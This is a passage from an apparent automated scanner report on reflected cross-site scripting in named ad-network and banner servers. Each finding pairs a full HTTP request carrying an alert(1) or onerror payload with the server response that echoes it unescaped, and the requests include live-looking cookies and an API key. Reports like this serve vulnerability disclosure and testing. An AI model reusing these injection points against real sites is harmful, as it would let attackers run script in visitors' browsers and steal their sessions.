Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:31 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3763
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1f5ed1--><script>alert(1)</script>0d8bde65243" -->
   
...[SNIP]...

1.26. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 85448<script>alert(1)</script>62018abb6b0 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback85448<script>alert(1)</script>62018abb6b0&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 15 Aug 2011 18:45:54 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUEXQDRa4FQSaj5XcunNcMDa7Re6IGD4lKisu1VJlT9GUAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAyzmNdcv2CGOaEVUJBxdqAyAwipn98ipCZ0XpiijciiL4ZWqFatDBXHIOgV0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 217
Connection: keep-alive

cnnad_bizo_load_ad_callback85448<script>alert(1)</script>62018abb6b0({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.27. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5c4c2<script>alert(1)</script>6caff385852 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr45c4c2<script>alert(1)</script>6caff385852 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 15 Aug 2011 18:45:57 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (vuy5aqx2hg8yv997yw9e5jr45c4c2<script>alert(1)</script>6caff385852)

1.28. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f7ac<img%20src%3da%20onerror%3dalert(1)>68796daa3dc was submitted in the REST URL parameter 3. This input was echoed as 5f7ac<img src=a onerror=alert(1)>68796daa3dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /go/page/iframe_cm_263585f7ac<img%20src%3da%20onerror%3dalert(1)>68796daa3dc?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:08:05 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,9kkT3FAgrg/ltHNWFQ_6tJzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:08:05 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki55-32.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 4231
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<!-- v.live-curr -->


[nopath::iframe_cm_263585f7ac<img src=a onerror=alert(1)>68796daa3dc:ffadult:english]
<script type="text/javascript">
...[SNIP]...

1.29. http://banners.bookofsex.com/go/page/iframe_cm_26400 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f30f<img%20src%3da%20onerror%3dalert(1)>f85e16a239f was submitted in the REST URL parameter 3. This input was echoed as 8f30f<img src=a onerror=alert(1)>f85e16a239f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /go/page/iframe_cm_264008f30f<img%20src%3da%20onerror%3dalert(1)>f85e16a239f?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:42 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,MmN0w/pHhOtiUhvu2cqOAhPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:42 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki50-16.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 3530
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<!-- v.live-curr -->


[nopath::iframe_cm_264008f30f<img src=a onerror=alert(1)>f85e16a239f:ffadult:english]
<script language="javascript" type="text/javascript">
...[SNIP]...

1.30. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d11f'%3balert(1)//c15b8b043d6 was submitted in the $ parameter. This input was echoed as 9d11f';alert(1)//c15b8b043d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=9d11f'%3balert(1)//c15b8b043d6&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:9d11f';alert(1)//c15b8b043d6;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',9d11f';alert(1)//c15b8b043d6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9d11f';alert(1)//c15b8b043d6;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasA
...[SNIP]...

1.31. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 670b3"%3balert(1)//f5912b9b2f0 was submitted in the $ parameter. This input was echoed as 670b3";alert(1)//f5912b9b2f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=670b3"%3balert(1)//f5912b9b2f0&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:670b3";alert(1)//f5912b9b2f0;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',670b3";alert(1)//f5912b9b2f0';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,670b3";alert(1)//f5912b9b2f0;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.32. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87fc'%3balert(1)//ee4a5933799 was submitted in the q parameter. This input was echoed as d87fc';alert(1)//ee4a5933799 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=d87fc'%3balert(1)//ee4a5933799&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 14 Aug 2012 18:55:44 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 960
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='d87fc';alert(1)//ee4a5933799';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d87fc';alert(1)//ee4a5933799;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd
...[SNIP]...

1.33. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff9f3"%3balert(1)//2cfb0f5522a was submitted in the q parameter. This input was echoed as ff9f3";alert(1)//2cfb0f5522a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=ff9f3"%3balert(1)//2cfb0f5522a&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 951
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='ff9f3";alert(1)//2cfb0f5522a';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=ff9f3";alert(1)//2cfb0f5522a;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.34. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee14d"%3balert(1)//df0d75c743f was submitted in the $ parameter. This input was echoed as ee14d";alert(1)//df0d75c743f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=ee14d"%3balert(1)//df0d75c743f&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:ee14d";alert(1)//df0d75c743f;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',ee14d";alert(1)//df0d75c743f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ee14d";alert(1)//df0d75c743f;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.35. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 417bf'%3balert(1)//f75064a5c68 was submitted in the $ parameter. This input was echoed as 417bf';alert(1)//f75064a5c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=417bf'%3balert(1)//f75064a5c68&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
